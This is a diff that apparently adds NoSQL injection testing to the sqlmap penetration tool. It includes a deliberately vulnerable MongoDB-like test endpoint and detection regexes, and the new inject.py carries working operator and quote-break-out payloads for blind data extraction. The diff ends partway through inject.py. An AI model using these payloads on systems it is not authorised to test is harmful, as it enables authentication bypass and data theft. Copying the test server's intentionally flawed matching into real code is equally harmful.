diff --git a/data/txt/sha256sums.txt b/data/txt/sha256sums.txt
index 7a941787127..eecb2bff2a9 100644
--- a/data/txt/sha256sums.txt
+++ b/data/txt/sha256sums.txt
@@ -160,10 +160,10 @@ ca86d61d3349ed2d94a6b164d4648cff9701199b5e32378c3f40fca0f517b128 extra/shutils/
df768bcb9838dc6c46dab9b4a877056cb4742bd6cfaaf438c4a3712c5cc0d264 extra/shutils/recloak.sh
1972990a67caf2d0231eacf60e211acf545d9d0beeb3c145a49ba33d5d491b3f extra/shutils/strip.sh
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 extra/vulnserver/__init__.py
-63657c00a046ca0fb28fd069407ab6305bd7b95c42f26a96ed083fd05b152252 extra/vulnserver/vulnserver.py
+43214ecb0101bce72eb243c91b90db34693ebfd485d6c111a4ae22591ff7800b extra/vulnserver/vulnserver.py
a2bf70d7f87c3a4e0675c0bad54119a4e04efa6ea2730a8338d5aebcd995630e lib/controller/action.py
-9387fb775b694156a71b336a2a9638ef24c577aa38746f391ac040ff05306d95 lib/controller/checks.py
-96463b969312bd4fd29452b5fc739f33e5a73f81fdc1ef80ac27debbe9926e42 lib/controller/controller.py
+0c6433b289094d37f295238699042a34a6ab950bb3d11f74fe9a83d30bb7f4bd lib/controller/checks.py
+ea0fdf6bcda59aae4d093bada965654a0cd940227c2dbdf62b6ded79baa8dfad lib/controller/controller.py
d69e84f1648cdb907f5d2dd454f03874a4613752b07867510145d51d84b3c56f lib/controller/handler.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/controller/__init__.py
9c5764c92ce536d1f0f96200359ee5ef1f37f9128769bf990cb77f1d1f8e17b1 lib/core/agent.py
@@ -181,7 +181,7 @@ f8de57606325456928e46ae2896f5f8bbec9ad18b1c644b492a566fa992216f6 lib/core/decor
5387168e5dfedd94ae22af7bb255f27d6baaca50b24179c6b98f4f325f5cc7b4 lib/core/exception.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/core/__init__.py
914a13ee21fd610a6153a37cbe50830fcbd1324c7ebc1e7fc206d5e598b0f7ad lib/core/log.py
-8b260bff7f24947ece55727277d526c88a91f7cb9ffe059c4b9c190bf85f80e1 lib/core/optiondict.py
+056930fba3cf9827f97d280bc38ac785c93108eb84c922f5f39723bb04dcf403 lib/core/optiondict.py
4e7f2ad3d2866093aa195616a0e93de1687406edc0b9038fbfa76bf1c9c174b2 lib/core/option.py
ccc4a717e887652b1fcce073d9409d9c59a3b28548c703a9e453d15845f90cd7 lib/core/patch.py
49c0fa7e3814dfda610d665ee02b12df299b28bc0b6773815b4395514ddf8dec lib/core/profiling.py
@@ -189,18 +189,18 @@ ccc4a717e887652b1fcce073d9409d9c59a3b28548c703a9e453d15845f90cd7 lib/core/patch
9bf174058f15d14e24e94f9aaf42df045119d3617c6c54bd2f3af79b462f331d lib/core/replication.py
0b8c38a01bb01f843d94a6c5f2075ee47520d0c4aa799cecea9c3e2c5a4a23a6 lib/core/revision.py
888daba83fd4a34e9503fe21f01fef4cc730e5cde871b1d40e15d4cbc847d56c lib/core/session.py
-2db950a79f3f8a4bbb0f35731d4e2eef220150961be55d8ba4b1f9565bdd483a lib/core/settings.py
+ca14e55b4d49a9b9f4e547180828030e4fcc51176dc9036879dbdae05919dd02 lib/core/settings.py
c7804223319e18eb0b8e2cbf0a8b6896d1cefb7b0b1a2e9f1cf826a8a3b56750 lib/core/shell.py
a2e98a94b231432736d6b304fc75525c8b5fdb4768c418387c5b4c1a610dad64 lib/core/subprocessng.py
19f1e3c5e3ba703d28d510cd7a9ab8284d5fbe9df5ce7e77c86e5931571364b7 lib/core/target.py
-c1392cda2f202fa3c628f74533c8d9379d1cf7e754ac165e39021bbc2bbc4a22 lib/core/testing.py
+e453904a50372216b09146ad9f11cdced2323c10f49c3d866238cc044dcb2cce lib/core/testing.py
95656c44bab1771f4808030dd6a17eae5b129cb1234443f00b19695c7b712b86 lib/core/threads.py
b9aacb840310173202f79c2ba125b0243003ee6b44c92eca50424f2bdfc83c02 lib/core/unescaper.py
53e396902cb2546eaa09e77073fcba8be8827ee9ce055cfc899e81b0e6ad4d6d lib/core/update.py
2400e465fa4d13e4c32795910878c71ff212e4361b46428d57ce43983f5e997c lib/core/wordlist.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/__init__.py
54bfd31ebded3ffa5848df1c644f196eb704116517c7a3d860b5d081e984d821 lib/parse/banner.py
-6060d2d11fab39796b87ace30a872302f365dea3b14d24670915fdb9edc86011 lib/parse/cmdline.py
+223badcfd102cdf3313411b63d09b6c59599d58dfc40d27409b1bfa2efc1aa8f lib/parse/cmdline.py
02d82e4069bd98c52755417f8b8e306d79945672656ac24f1a45e7a6eff4b158 lib/parse/configfile.py
c5b258be7485089fac9d9cd179960e774fbd85e62836dc67cce76cc028bb6aeb lib/parse/handler.py
5c9a9caee948843d5537745640cc7b98d70a0412cc0949f59d4ebe8b2907c06c lib/parse/headers.py
@@ -240,6 +240,8 @@ a66a4b9df6207dce722c9b71d290ea426723cb4b697b416065dc7dd5db96fe8e lib/techniques
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/error/__init__.py
5bbef46c16e34fd80e3f9f0e9aa255ce2e39be0d0e57479e25890b041c7efc7d lib/techniques/error/use.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/__init__.py
+44401cad3e39ae9fb899ed5d0e2fdd0879561de05c3117f17f3b0db54f4e3724 lib/techniques/nosql/__init__.py
+d62b28bf9f1544e65a1017994402f484166f4d64a1efb724351b15e27b851990 lib/techniques/nosql/inject.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/union/__init__.py
ceec65f8cb7c3254c4671351c837418c76ac5bc55ccbc40779f67231b54d7085 lib/techniques/union/test.py
c65766f71e285fc85cdf58e7448c4c1d015af2a9dbb44fa3b665a9f13362fbcc lib/techniques/union/use.py
@@ -597,6 +599,7 @@ c04e8358fb6df45f69f2f26435c971acde280535bf304e84d30cf2681158c6a7 tests/test_has
d539d0ae758b5bb91e314ab82ab4fe03d6fb2f8b377d16aefa6d7d1d77a7d5a9 tests/test_identifiers_output.py
5372270b7ed82b62f273c2e9bd1f7ecd8605371e66cd0ad70663762cb08d42f1 tests/test_inference_engine.py
caa06fed7323b2bb6d0f2443ce343de94f75bf8ad012c055d5e07741d908ebad tests/test_misc.py
+790b78c600b61eb0bdd6e07e14b1db3eb2ddd5fc5d4edb9e975f85ced38558c7 tests/test_nosql.py
57fa9713a3186020be8bcc3f06399e92bf9ce82ec6d3413c76babe19606bb698 tests/test_openapi_drift.py
cde0bea1263ae857561f91ed2bd515e972b716743f017d31b1718a8546c72759 tests/test_pagecontent.py
4bac34af2abddce003756d6776e89b2fda220bb7603ef3761f4f37ee29f9c369 tests/test_payload_marking.py
diff --git a/extra/vulnserver/vulnserver.py b/extra/vulnserver/vulnserver.py
index 47ba2cb0b8b..25e4bb3a960 100644
--- a/extra/vulnserver/vulnserver.py
+++ b/extra/vulnserver/vulnserver.py
@@ -122,6 +122,46 @@
LISTEN_ADDRESS = "localhost"
LISTEN_PORT = 8440
+# In-memory stand-in for a MongoDB collection, queried by the NoSQL operator-injection endpoint
+# ('/nosql'): maps 'name' -> 'password' (the value recovered by blind extraction for a given name).
+NOSQL_USERS = {
+    "luther": "s3cr3t",
+    "fluffy": "carrot",
+    "wu": "shanghai",
+}
+
+def nosql_match(params):
+    """Evaluates a MongoDB-like find() filter against NOSQL_USERS. The 'password' operator object is
+    rebuilt from either a JSON sub-document or a bracket-notation key ('password[$ne]=...') and then
+    applied to the record picked by 'name'. Returns True/False; a malformed $regex propagates
+    re.error (surfaced as a driver error)."""
+
+    stored = NOSQL_USERS.get(params.get("name"))
+    given = params.get("password")
+
+    if isinstance(given, dict):
+        operator, operand = next(iter(given.items()), ("$eq", None))
+    else:
+        operator, operand = "$eq", given
+        hits = ((re.match(r"^password\[(\$\w+)\](?:\[\])?$", _), _) for _ in params)
+        found, key = next((pair for pair in hits if pair[0]), (None, None))
+        if found:
+            operator, operand = found.group(1), params[key]
+
+    if isinstance(operand, (tuple, list)):  # multi-valued parameter -> last occurrence wins
+        operand = operand[-1] if operand else None
+
+    if stored is None:
+        return False
+    if operator == "$ne":
+        return stored != operand
+    if operator == "$gt":
+        return stored > (operand or "")
+    if operator == "$regex":
+        return re.search(operand, stored) is not None
+
+    return stored == operand  # $eq, $in (single-valued here) and any literal equality
+
_conn = None
_cursor = None
_lock = None
@@ -285,6 +325,20 @@ def do_REQUEST(self):
self.wfile.write(form.encode(UNICODE_ENCODING))
return
+        if self.url == "/nosql":  # NoSQL operator-injection endpoint (filter evaluated by nosql_match())
+            self.send_response(OK)
+            self.send_header("Content-type", "text/html; charset=%s" % UNICODE_ENCODING)
+            self.send_header("Connection", "close")
+            self.end_headers()
+
+            try:  # the '%' binds tighter than the conditional: welcome text on a match, rejection otherwise
+                output = "Welcome %s" % self.params.get("name") if nosql_match(self.params) else "Invalid credentials"
+            except re.error:  # invalid $regex -> emulate a MongoDB driver error (drives fingerprinting)
+                output = "MongoServerError: Regular expression is invalid: missing terminating ] for character class"
+
+            self.wfile.write(output.encode(UNICODE_ENCODING))
+            return
+
if self.url == '/':
if not any(_ in self.params for _ in ("id", "query")):
self.send_response(OK)
diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index c450aa1d7f3..128b4123d95 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -87,6 +87,7 @@
from lib.core.settings import MAX_DIFFLIB_SEQUENCE_LENGTH
from lib.core.settings import MAX_STABILITY_DELAY
from lib.core.settings import NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH
+from lib.core.settings import NOSQL_ERROR_REGEX
from lib.core.settings import PRECONNECT_INCOMPATIBLE_SERVERS
from lib.core.settings import SINGLE_QUOTE_MARKER
from lib.core.settings import SLEEP_TIME_MARKER
@@ -1170,6 +1171,13 @@ def _(page):
except (SystemError, RuntimeError) as ex:
logger.debug("Skipping FI heuristic due to regex failure: %s", getSafeExString(ex))
+ if not conf.nosql and re.search(NOSQL_ERROR_REGEX, page or ""):
+ infoMsg = "heuristic (NoSQL) test shows that %sparameter '%s' might be vulnerable to NoSQL injection attacks (rerun with switch '--nosql')" % ("%s " % paramType if paramType != parameter else "", parameter)
+ logger.info(infoMsg)
+
+ if conf.beep:
+ beep()
+
kb.disableHtmlDecoding = False
kb.heuristicMode = False
diff --git a/lib/controller/controller.py b/lib/controller/controller.py
index bd3418d35a5..32857537608 100644
--- a/lib/controller/controller.py
+++ b/lib/controller/controller.py
@@ -520,6 +520,11 @@ def start():
checkWaf()
+ if conf.nosql:
+ from lib.techniques.nosql.inject import nosqlScan
+ nosqlScan()
+ continue
+
if conf.nullConnection:
checkNullConnection()
diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py
index 1a7d34b0129..ffb03d3fe70 100644
--- a/lib/core/optiondict.py
+++ b/lib/core/optiondict.py
@@ -118,6 +118,7 @@
"Techniques": {
"technique": "string",
+ "nosql": "boolean",
"timeSec": "integer",
"uCols": "string",
"uChar": "string",
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 0a2fc08ab84..6ad6cb33d9a 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -20,7 +20,7 @@
from thirdparty import six
# sqlmap version (...)
-VERSION = "1.10.6.159"
+VERSION = "1.10.6.160"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
@@ -466,7 +466,8 @@
r"error '[0-9a-f]{8}'((<[^>]+>)|\s)+(?P<result>[^<>]+)",
r"\[[^\n\]]{1,100}(ODBC|JDBC)[^\n\]]+\](\[[^\]]+\])?(?P<result>[^\n]+(in query expression|\(SQL| at /[^ ]+pdo)[^\n<]+)",
r"(?P<result>query error: SELECT[^<>]+)",
- r"(?P<result>(?:(?:ORA|PLS)-[0-9]{5}:|SQLCODE[ =:]+-?[0-9]+|SQLSTATE[ =:]+[0-9A-Z]{5}|Dynamic SQL Error|DB2 SQL error:|SAP DBTech JDBC:|SQLiteException:|You have an error in your SQL syntax;|Incorrect syntax near |Unclosed quotation mark after the character string|near \"[^\"]+\": syntax error)[^\n<]*)"
+ r"(?P<result>(?:(?:ORA|PLS)-[0-9]{5}:|SQLCODE[ =:]+-?[0-9]+|SQLSTATE[ =:]+[0-9A-Z]{5}|Dynamic SQL Error|DB2 SQL error:|SAP DBTech JDBC:|SQLiteException:|You have an error in your SQL syntax;|Incorrect syntax near |Unclosed quotation mark after the character string|near \"[^\"]+\": syntax error)[^\n<]*)",
+ r'"(?:errmsg|errorMessage|reason|msg)"\s*:\s*"(?P<result>[^"]+)"' # generic JSON error-message field (NoSQL document/REST back-ends)
)
# Regular expression used for parsing charset info from meta html headers
@@ -847,6 +848,35 @@
# Regular expression used for recognition of file inclusion errors
FI_ERROR_REGEX = r"(?i)[^\n]{0,100}(no such file|failed (to )?open)[^\n]{0,100}"
+# (back-end, regular expression) pairs recognizing NoSQL error messages (anchored to actual error-message structure - not product names); joined below into the single pattern used for heuristic recognition of NoSQL injection
+NOSQL_ERRORS = (
+    ("MongoDB", r"Mongo(?:Server|Parse|Network|Runtime|Bulk|WriteConcern)?Error\b|\bBSON(?:Type)?Error\b|\bMongooseError\b|CastError: Cast to|unknown (?:top.level )?operator: ?\$|\$(?:regex|where|expr|in|nin|ne|gt|lt|elemMatch) (?:has to be|is not allowed|must be|not supported|requires)|Regular expression is invalid"),
+    ("CouchDB", r'"error"\s*:\s*"(?:bad_request|query_parse_error|missing_named_query)"|invalid operator: ?\$'),
+    ("Elasticsearch", r'"type"\s*:\s*"[a-z_]*?(?:query_shard|x_content_parse|parsing|search_phase_execution|illegal_argument|too_many_clauses|number_format|script)_exception"|Failed to parse query \['),
+    ("Solr", r"org\.apache\.solr\.[\w.]*(?:SyntaxError|SolrException)"),
+    ("Neo4j", r"Neo\.(?:ClientError|DatabaseError|TransientError|ClientNotification)\.|\bNeo4jError\b|even number of non-escaped quotes|Failed to parse string literal|expected an expression|'(?:UNWIND|OPTIONAL|DETACH|FOREACH|MERGE|LOAD CSV)'"),
+    ("ArangoDB", r"\bArangoError\b|AQL: (?:syntax|parse) error"),
+    ("Cassandra", r"line \d+:\d+ (?:no viable alternative at input|(?:mismatched|extraneous) input '.*?' expecting)|org\.apache\.cassandra|com\.datastax|\bInvalid(?:Request|Query)Exception\b"),
+    ("Redis", r"\bWRONGTYPE\b|ERR Error (?:compiling|running) script|@user_script|\bReplyError\b"),
+    ("Memcached", r"CLIENT_ERROR bad|SERVER_ERROR object too large"),
+    ("InfluxDB", r"error parsing query|unable to parse '[^']*': found"),
+    ("HBase/Phoenix", r"org\.apache\.phoenix|PhoenixParserException|org\.apache\.hadoop\.hbase"),
+)
+NOSQL_ERROR_REGEX = "(?:%s)" % '|'.join(regex for _, regex in NOSQL_ERRORS)  # one non-capturing alternation of all per-back-end patterns
+
+# Printable-ASCII codepoint bounds - 0x20 (space) to 0x7e ('~') - bisected (via regexp character-class ranges) during NoSQL blind extraction
+NOSQL_CHAR_MIN = 0x20
+NOSQL_CHAR_MAX = 0x7e
+
+# Maximum number of document fields enumerated during a NoSQL document dump (e.g. $where server-side JavaScript key enumeration)
+NOSQL_MAX_FIELDS = 64
+
+# Maximum number of records walked during a NoSQL blind multi-record (ordered key paging) collection dump
+NOSQL_MAX_RECORDS = 100
+
+# Upper bound (in characters) for the length search during NoSQL blind extraction
+NOSQL_MAX_LENGTH = 1024
+
# Length of prefix and suffix used in non-SQLI heuristic checks
NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH = 6
diff --git a/lib/core/testing.py b/lib/core/testing.py
index a1773789c4e..0d9a084e7e3 100644
--- a/lib/core/testing.py
+++ b/lib/core/testing.py
@@ -88,6 +88,7 @@ def vulnTest():
("-u --flush-session --technique=B --keyset --dump -T users", ("using keyset (seek) pagination", "30 entries", "luther", "nameisnull")), # keyset/seek dump via the SQLite rowid cursor
("-u -z \"tec=B\" --hex --fresh-queries --threads=4 --sql-query=\"SELECT * FROM users\"", ("SELECT * FROM users [30]", "nameisnull")),
("-u \"&echo=foobar*\" --flush-session", ("might be vulnerable to cross-site scripting",)),
+ ("-u \"nosql?name=luther&password=x\" -p password --nosql --flush-session", ("is vulnerable to NoSQL injection", "back-end: 'MongoDB'", "NoSQL: GET parameter 'password'", "s3cr3t")), # NoSQL (MongoDB) operator-injection detection + blind regexp extraction
("-u \"&query=*\" --flush-session --technique=Q --banner", ("Title: SQLite inline queries", "banner: '3.")),
("-d \"\" --flush-session --dump -T creds --dump-format=SQLITE --binary-fields=password_hash --where \"user_id=5\"", ("3137396164343563366365326362393763663130323965323132303436653831", "dumped to SQLITE database")),
("-d \"\" --flush-session --banner --schema --sql-query=\"UPDATE users SET name='foobar' WHERE id=4; SELECT * FROM users; SELECT 987654321\"", ("banner: '3.", "INTEGER", "TEXT", "id", "name", "surname", "4,foobar,nameisnull", "'987654321'",)),
diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index d35c61b958f..c6e4205ab38 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -415,6 +415,9 @@ def cmdLineParser(argv=None):
techniques.add_argument("--technique", dest="technique",
help="SQL injection techniques to use (default \"%s\")" % defaults.technique)
+ techniques.add_argument("--nosql", dest="nosql", action="store_true",
+ help="Test for NoSQL injection (e.g. MongoDB, CouchDB, Neo4j)")
+
techniques.add_argument("--time-sec", dest="timeSec", type=int,
help="Seconds to delay the DBMS response (default %d)" % defaults.timeSec)
diff --git a/lib/techniques/nosql/__init__.py b/lib/techniques/nosql/__init__.py
new file mode 100644
index 00000000000..2c772879a4f
--- /dev/null
+++ b/lib/techniques/nosql/__init__.py
@@ -0,0 +1,6 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
+See the file 'LICENSE' for copying permission
+"""
diff --git a/lib/techniques/nosql/inject.py b/lib/techniques/nosql/inject.py
new file mode 100644
index 00000000000..ed26886dc6d
--- /dev/null
+++ b/lib/techniques/nosql/inject.py
@@ -0,0 +1,765 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
+See the file 'LICENSE' for copying permission
+"""
+
+import difflib
+import json
+import re
+import time
+
+from collections import namedtuple
+from collections import OrderedDict
+
+from lib.core.common import randomStr
+from lib.core.data import conf
+from lib.core.data import kb
+from lib.core.data import logger
+from lib.core.enums import CUSTOM_LOGGING
+from lib.core.enums import PLACE
+from lib.core.enums import POST_HINT
+from lib.core.settings import NOSQL_CHAR_MAX
+from lib.core.settings import NOSQL_CHAR_MIN
+from lib.core.settings import NOSQL_ERROR_REGEX
+from lib.core.settings import NOSQL_MAX_FIELDS
+from lib.core.settings import NOSQL_MAX_LENGTH
+from lib.core.settings import NOSQL_MAX_RECORDS
+from lib.core.settings import UPPER_RATIO_BOUND
+from lib.request.connect import Connect as Request
+from lib.utils.xrange import xrange
+from thirdparty.six.moves import urllib as _urllib
+
+# Improbable literal used to build always-true/never-match payloads. Generated once at import time
+# (random per run, like kb.chars boundaries) so it never becomes a static signature a WAF can block.
+NOSQL_SENTINEL = randomStr(length=10, lowercase=True)
+
+# Maximum number of characters of in-band (reflected) data surfaced from an always-true response
+NOSQL_DUMP_LIMIT = 4096
+
+# Request places (parameter locations) that can carry an injection into a back-end filter/query
+NOSQL_PLACES = (PLACE.GET, PLACE.POST, PLACE.URI, PLACE.CUSTOM_POST, PLACE.COOKIE)
+
+# Lucene regexp metacharacters (Elasticsearch/Solr) that _lucene() backslash-escapes in built patterns
+LUCENE_META = set('.?+*|(){}[]"\\/')
+
+# Java regexp metacharacters (Cypher/AQL =~) that _javaEscape() backslash-escapes in built patterns
+JAVA_META = set('.?+*|(){}[]^$\\/')
+
+# Engines detectable through a syntax-breaking probe but lacking a clean substring oracle for blind
+# extraction: (back-end name, error-message fragments). Fragments must be lower-case (matched against the lower-cased page)
+ERROR_SIGNATURES = (
+    ("Cassandra", ("no viable alternative at input", "org.apache.cassandra", "com.datastax", "invalidrequestexception")),
+    ("Redis", ("wrongtype operation", "err error compiling script", "err error running script", "@user_script", "replyerror")),
+    ("Memcached", ("client_error bad", "server_error object too large")),
+    ("InfluxDB", ("error parsing query", "unable to parse")),
+    ("HBase/Phoenix", ("org.apache.phoenix", "phoenixparserexception", "org.apache.hadoop.hbase")),
+)
+
+_UNSET = object()  # sentinel default of _send()'s `jsonValue`: tells "not given" apart from an explicit None
+
+# HTTP status of the most recent request issued by _send() (None when bypassed, e.g. under tests)
+_lastCode = None
+
+# Resolved injection vector. `template` is the always-true page for content-based blind extraction
+# (None for time-based/detection-only); `bypass` is the always-true payload reported as a login/filter
+# bypass; `truth` overrides the content oracle (e.g. a timing predicate for the $where time-based path);
+# `dump` is a callable returning (columns, rows) for a whole-document dump (server-side-JS key enumeration).
+Vector = namedtuple("Vector", ("dbms", "fetch", "lengthValue", "charValue", "template", "bypass", "truth", "dump"))
+Vector.__new__.__defaults__ = (None, None, None, None)  # defaults for the last four fields: template, bypass, truth, dump
+
+def _ratio(first, second):
+    return difflib.SequenceMatcher(a=first or "", b=second or "").quick_ratio()  # quick upper bound of the similarity; None counts as ""
+
+def _encode(value):
+    return _urllib.parse.quote(value, "")  # empty `safe` set, so even '/' gets percent-encoded
+
+def _lucene(value):
+    return "".join("\\%s" % char if char in LUCENE_META else char for char in value)  # backslash-escape Lucene regexp metacharacters
+
+def _javaEscape(value):
+    return "".join("\\%s" % char if char in JAVA_META else char for char in value)  # backslash-escape Java regexp metacharacters
+
+def _quoted(regex):
+    # single-quoted string literals (Cypher/AQL/N1QL) consume one level of backslashes on their own,
+    # hence every backslash is doubled for the regexp to reach the engine's regexp parser intact
+    return "\\\\".join(regex.split("\\"))
+
+def _isJsonBody():
+    return kb.postHint == POST_HINT.JSON or kb.postHint == POST_HINT.JSON_LIKE  # request body recognized as JSON(-like)
+
+def _jsonKey(parameter):
+    # strips a leading "JSON "/"JSON-like " label from the parameter name, leaving the bare key
+    labels = ("JSON ", "JSON-like ")
+    label = next((_ for _ in labels if parameter.startswith(_)), "")
+    return parameter[len(label):]
+
+def _delim(place):
+    # cookies are split on the --cookie-del value (';' when unset); every other place on '&'
+    return '&' if place != PLACE.COOKIE else (conf.cookieDel or ';')
+
+def _originalValue(place, parameter):
+    pairs = (_.partition('=') for _ in conf.parameters[place].split(_delim(place)))
+    found = next((value for name, _, value in pairs if name.strip() == parameter), None)
+    if found is not None:  # first occurrence, exactly as it appears in conf.parameters[place]
+        return found
+    return conf.paramDict.get(place, {}).get(parameter) or ""
+
+def _replaceSegment(place, parameter, segment):
+    """Returns conf.parameters[place] with the first occurrence of the target parameter replaced by
+    `segment` (e.g. 'k[$ne]=v' or 'k=v'); all other parameters are carried over untouched"""
+
+    delimiter = _delim(place)
+    parts = conf.parameters[place].split(delimiter)
+    names = [_.split('=', 1)[0].strip() for _ in parts]
+
+    if parameter in names:
+        index = names.index(parameter)
+        parts[index] = segment
+    else:
+        # target absent from the raw string - rebuild (re-encoded) from the parsed parameters
+        parts = []
+        for name, value in conf.paramDict[place].items():
+            parts.append(segment if name == parameter else "%s=%s" % (_encode(name), _encode(value)))
+
+    return delimiter.join(parts)
+
+def _send(place, parameter, segment=None, jsonValue=_UNSET):
+    """Issues one request with the target parameter overridden (raw 'name=value' `segment` for URL/body/
+    cookie, or the key set to `jsonValue` in a JSON body). Returns the page ('' if none); sets _lastCode"""
+
+    global _lastCode
+
+    skipUrlEncode = conf.skipUrlEncode  # saved so that the finally clause can restore it
+    conf.skipUrlEncode = True  # NOTE(review): presumably avoids re-encoding the _encode()-d segment - confirm in Request.getPage()
+
+    try:
+        kwargs = {"raise404": False, "silent": True}
+
+        if jsonValue is not _UNSET and _isJsonBody() and place in (PLACE.POST, PLACE.CUSTOM_POST):
+            try:
+                data = json.loads(conf.data)
+            except Exception:  # unparsable body -> only the overridden key ends up being sent
+                data = {}
+            data[_jsonKey(parameter)] = jsonValue
+            payload = kwargs["post"] = json.dumps(data)
+        elif place == PLACE.COOKIE:
+            payload = kwargs["cookie"] = _replaceSegment(place, parameter, segment)
+        else:
+            payload = _replaceSegment(place, parameter, segment)
+            kwargs["post" if place in (PLACE.POST, PLACE.CUSTOM_POST) else "get"] = payload
+
+        logger.log(CUSTOM_LOGGING.PAYLOAD, _urllib.parse.unquote(payload))  # readable, surfaced at -v 3 like a regular sqlmap payload
+        page, _, _lastCode = Request.getPage(**kwargs)  # status code kept for _isError()
+    finally:
+        conf.skipUrlEncode = skipUrlEncode
+
+    return page or ""
+
+def _isError(page):
+    # True for a 5xx status of the latest request or a body matching a known back-end error message;
+    # such a response must never serve as the always-true template of a boolean oracle
+    return bool((_lastCode or 0) >= 500 or re.search(NOSQL_ERROR_REGEX, page or ""))
+
+def _fetch(place, parameter, op, value, isArray=False):
+    """Operator-object dialect (MongoDB/CouchDB): 'param[$op]=value' or JSON {"$op": value}; isArray wraps the value in a list"""
+
+    template = "%s[%s][]=%s" if isArray else "%s[%s]=%s"
+    operand = [value] if isArray else value
+    return _send(place, parameter, template % (_encode(parameter), op, _encode(value)), {op: operand})
+
+def _fetchValue(place, parameter, value):
+    """Plain-value dialects (Lucene query_string, Cypher, AQL): the payload replaces the whole parameter value"""
+    pair = (_encode(parameter), _encode(value))
+    return _send(place, parameter, "%s=%s" % pair, value)
+
+def _boolean(truthy, falsy):
+    """Runs truthy(), falsy() and truthy() again; returns the first true-page if it is non-empty, not an
+    error response, reproducible and clearly different from the false-page - otherwise None"""
+
+    reference = truthy()
+    usable = bool(reference) and not _isError(reference)  # error pages cannot act as a template
+
+    if usable:
+        negative = falsy()
+        usable = _ratio(reference, truthy()) > UPPER_RATIO_BOUND  # same payload -> same page
+        usable = usable and _ratio(reference, negative) < UPPER_RATIO_BOUND  # true page != false page
+
+    return reference if usable else None
+
+def _detectMongo(place, parameter):
+    # always-true candidates: $ne sentinel (matches everything), then $gt '' (matches any string - for
+    # apps filtering $ne only); always-false counterpart: $in [sentinel] (matches nothing)
+    never = lambda: _fetch(place, parameter, "$in", NOSQL_SENTINEL, isArray=True)
+    return _boolean(lambda: _fetch(place, parameter, "$ne", NOSQL_SENTINEL), never) or _boolean(lambda: _fetch(place, parameter, "$gt", ""), never)
+
+def _detectES(place, parameter):
+    probe = lambda value: (lambda: _fetchValue(place, parameter, value))  # deferred single-value request
+    return _boolean(probe('*'), probe(NOSQL_SENTINEL))  # query_string '*' (matches everything) vs literal sentinel (matches nothing)
+
+def _detectCypher(place, parameter):
+    probe = lambda tail: (lambda: _fetchValue(place, parameter, NOSQL_SENTINEL + tail))  # single-quote break-out
+    return _boolean(probe("' OR '1'='1"), probe("' OR '1'='2"))  # OR '1'='1' (true) vs OR '1'='2' (false)
+
+def _detectAQL(place, parameter):
+    probe = lambda tail: (lambda: _fetchValue(place, parameter, NOSQL_SENTINEL + tail))  # single-quote break-out
+    return _boolean(probe("' || '1'=='1"), probe("' || '1'=='2"))  # || '1'=='1 (true) vs || '1'=='2 (false)
+
+def _detectNumeric(place, parameter):
+    # boolean break-out in an unquoted (numeric) context: OR/AND for Cypher, N1QL and PartiQL, ||/&&
+    # for AQL. Returns (dbms, always-true page, always-true payload) or None. A numeric field cannot
+    # be regexp-extracted blindly, so exploitation is the in-band dump of the always-true response
+    number = (_originalValue(place, parameter) or "1").strip()
+    if not number.isdigit():
+        return None
+
+    probe = lambda payload: (lambda: _fetchValue(place, parameter, payload % number))
+
+    page = _boolean(probe("%s OR 1=1"), probe("%s AND 1=2"))
+    if page:
+        # OR/AND is shared by three engines; each of N1QL (REGEXP_CONTAINS) and DynamoDB (begins_with)
+        # alone honors its constant-argument, field-free primitive - Cypher has neither
+        for dbms, primitive in (("Couchbase", "REGEXP_CONTAINS"), ("DynamoDB", "begins_with")):
+            if _confirm(place, parameter, "%s OR %s('ab', 'a') OR 1=2" % (number, primitive), "%s OR %s('ab', 'z') OR 1=2" % (number, primitive)):
+                break
+        else:
+            dbms = "Neo4j"
+        return dbms, page, "%s OR 1=1" % number
+
+    page = _boolean(probe("%s || 1==1"), probe("%s && 1==2"))
+    if page:
+        return "ArangoDB", page, "%s || 1==1" % number
+    return None
+
+def _detectError(place, parameter):
+    # last resort: appending a single quote must change the response AND expose a known engine error
+    baseline = _originalValue(place, parameter) or '1'
+    regular = _fetchValue(place, parameter, baseline)
+    faulty = _fetchValue(place, parameter, baseline + "'")
+
+    if regular and _ratio(regular, faulty) < UPPER_RATIO_BOUND:
+        lowered = faulty.lower()
+        for engine, tokens in ERROR_SIGNATURES:
+            for token in tokens:
+                if token in lowered:
+                    return engine
+
+    return None
+
+def _fingerprintMongo(place, parameter):
+    page = _fetch(place, parameter, "$regex", '(').lower()  # unbalanced '(' -> regexp error from the driver/DB
+    hints = (("CouchDB", ("couch", "mango", "bad_arg", "erlang")), ("MongoDB", ("mongo", "bson", "regular expression", "$regex")))
+
+    for dbms, tokens in hints:
+        if any(_ in page for _ in tokens):
+            return dbms
+    return "MongoDB (assumed)"
+
+def _fingerprintLucene(place, parameter):
+    page = _fetchValue(place, parameter, "/[/").lower()  # unterminated character class -> engine error
+
+    if "solr" in page or "solrexception" in page:
